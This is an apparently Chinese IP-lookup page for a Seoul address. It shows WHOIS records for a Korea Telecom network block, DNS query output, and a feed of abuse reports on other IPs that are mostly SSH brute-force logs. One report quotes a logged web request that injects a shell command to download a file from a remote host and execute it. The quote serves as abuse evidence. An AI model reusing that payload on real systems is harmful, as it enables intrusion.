必须是合法有效的IP地址, 可以是IPv4或者是IPv6, 例如127.0.0.1或者2001:DB8:0:0:8:800:200C:417A
基本信息:

城市(city): Seoul

省份(region): Seoul Special City

国家(country): South Korea

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:
暂无关于此IP的讨论, 沙发请点上方按钮
相同子网IP讨论:
暂无关于此IP所属子网相关IP的讨论.
WHOIS信息:
query : 211.104.7.243


# KOREAN(UTF8)

조회하신 IPv4주소는 한국인터넷진흥원으로부터 아래의 관리대행자에게 할당되었으며, 할당 정보는 다음과 같습니다.

[ 네트워크 할당 정보 ]
IPv4주소           : 211.104.0.0 - 211.105.255.255 (/15)
기관명             : 주식회사 케이티
서비스명           : KORNET
주소               : 경기도 성남시 분당구 불정로 90
우편번호           : 13606
할당일자           : 20000424

이름               : IP주소 담당자
전화번호           : +82-2-500-6630
전자우편           : kornet_ip@kt.com

--------------------------------------------------------------------------------

조회하신 IPv4주소에 대한 위 관리대행자의 사용자 할당정보가 존재하지 않습니다.


# ENGLISH

KRNIC is not an ISP but a National Internet Registry similar to APNIC.

[ Network Information ]
IPv4 Address       : 211.104.0.0 - 211.105.255.255 (/15)
Organization Name  : Korea Telecom
Service Name       : KORNET
Address            : Gyeonggi-do Bundang-gu, Seongnam-si Buljeong-ro 90
Zip Code           : 13606
Registration Date  : 20000424

Name               : IP Manager
Phone              : +82-2-500-6630
E-Mail             : kornet_ip@kt.com


- KISA/KRNIC WHOIS Service -
DIG信息:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 211.104.7.243
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 36237
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;211.104.7.243.			IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2026032901 1800 900 604800 86400

;; Query time: 5 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Mon Mar 30 08:28:41 CST 2026
;; MSG SIZE  rcvd: 106
HOST信息:
Host 243.7.104.211.in-addr.arpa. not found: 3(NXDOMAIN)
NSLOOKUP信息:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 243.7.104.211.in-addr.arpa: NXDOMAIN
相关IP信息:
最新评论:
IP 类型 评论内容 时间
23.106.219.74 attackspambots
(From snelling.cerys@gmail.com) Hi,

We're wondering if you've considered taking the written content from cannoncountychiro.com and converting it into videos to promote on Youtube? It's another method of generating traffic.

There's a free trial available to you at the following link: https://turntextintovideo.com

Regards,
Cerys
2020-03-23 12:16:10
27.83.170.191 attackspam
(sshd) Failed SSH login from 27.83.170.191 (JP/Japan/KD027083170191.ppp-bb.dion.ne.jp): 5 in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_SSHD; Logs: Mar 23 04:53:42 amsweb01 sshd[19785]: Invalid user admins from 27.83.170.191 port 47196
Mar 23 04:53:44 amsweb01 sshd[19785]: Failed password for invalid user admins from 27.83.170.191 port 47196 ssh2
Mar 23 05:10:04 amsweb01 sshd[22223]: Invalid user gaolei from 27.83.170.191 port 53094
Mar 23 05:10:06 amsweb01 sshd[22223]: Failed password for invalid user gaolei from 27.83.170.191 port 53094 ssh2
Mar 23 05:21:30 amsweb01 sshd[23794]: Invalid user fisnet from 27.83.170.191 port 52674
2020-03-23 12:22:25
222.186.15.91 attackspambots
IP blocked
2020-03-23 12:20:06
110.35.173.103 attackbotsspam
Mar 23 04:58:34 163-172-32-151 sshd[10607]: Invalid user sammy from 110.35.173.103 port 34064
...
2020-03-23 12:42:36
51.178.78.154 attackbotsspam
trying to access non-authorized port
2020-03-23 12:23:53
188.223.70.176 attackspambots
MYH,DEF GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE
2020-03-23 12:38:50
222.186.30.167 attackbotsspam
Mar 23 00:25:45 plusreed sshd[751]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.30.167  user=root
Mar 23 00:25:47 plusreed sshd[751]: Failed password for root from 222.186.30.167 port 49422 ssh2
...
2020-03-23 12:26:08
140.143.159.11 attack
Tried sshing with brute force.
2020-03-23 12:45:03
113.200.60.74 attack
(sshd) Failed SSH login from 113.200.60.74 (CN/China/-): 5 in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_SSHD; Logs: Mar 23 04:39:16 amsweb01 sshd[17770]: Invalid user iq from 113.200.60.74 port 51206
Mar 23 04:39:18 amsweb01 sshd[17770]: Failed password for invalid user iq from 113.200.60.74 port 51206 ssh2
Mar 23 04:50:50 amsweb01 sshd[19330]: Invalid user free from 113.200.60.74 port 60269
Mar 23 04:50:51 amsweb01 sshd[19330]: Failed password for invalid user free from 113.200.60.74 port 60269 ssh2
Mar 23 04:59:06 amsweb01 sshd[20616]: User mail from 113.200.60.74 not allowed because not listed in AllowUsers
2020-03-23 12:17:20
91.89.250.213 attackspambots
Mar 23 00:24:22 NPSTNNYC01T sshd[23818]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=91.89.250.213
Mar 23 00:24:24 NPSTNNYC01T sshd[23818]: Failed password for invalid user dev from 91.89.250.213 port 41850 ssh2
Mar 23 00:29:42 NPSTNNYC01T sshd[24124]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=91.89.250.213
...
2020-03-23 12:37:53
106.13.41.42 attackspambots
Mar 23 05:16:54 haigwepa sshd[17377]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.41.42 
Mar 23 05:16:56 haigwepa sshd[17377]: Failed password for invalid user ishana from 106.13.41.42 port 42704 ssh2
...
2020-03-23 12:18:12
200.54.250.98 attack
Mar 23 03:58:26 XXXXXX sshd[15460]: Invalid user fujimura from 200.54.250.98 port 49398
2020-03-23 12:09:28
178.62.248.61 attackbotsspam
2020-03-22T21:59:06.555230linuxbox-skyline sshd[92915]: Invalid user bt from 178.62.248.61 port 42048
...
2020-03-23 12:18:54
82.193.153.69 attackspambots
Automatic report - Port Scan Attack
2020-03-23 12:35:44
180.166.192.66 attack
(sshd) Failed SSH login from 180.166.192.66 (CN/China/-): 5 in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_SSHD; Logs: Mar 23 04:59:50 amsweb01 sshd[20699]: Invalid user silvana from 180.166.192.66 port 8796
Mar 23 04:59:52 amsweb01 sshd[20699]: Failed password for invalid user silvana from 180.166.192.66 port 8796 ssh2
Mar 23 05:04:48 amsweb01 sshd[21474]: Invalid user florian from 180.166.192.66 port 1978
Mar 23 05:04:50 amsweb01 sshd[21474]: Failed password for invalid user florian from 180.166.192.66 port 1978 ssh2
Mar 23 05:08:50 amsweb01 sshd[22046]: User apache from 180.166.192.66 not allowed because not listed in AllowUsers
2020-03-23 12:12:23

最近上报的IP列表

164.155.74.159 110.78.158.147 2606:4700:10::6814:4878 2606:4700:10::6816:4922
2606:4700:10::6816:4268 2606:4700:10::6814:5606 2606:4700:10::6816:862 2606:4700:10::6814:7437
2606:4700:10::6814:4957 23.249.153.175 131.64.176.255 47.128.123.132
178.197.194.225 84.20.253.231 204.76.203.59 198.18.53.126
2606:4700:10::6814:8033 2606:4700:10::6814:6843 2606:4700:10::6816:2032 2606:4700:10::6814:9308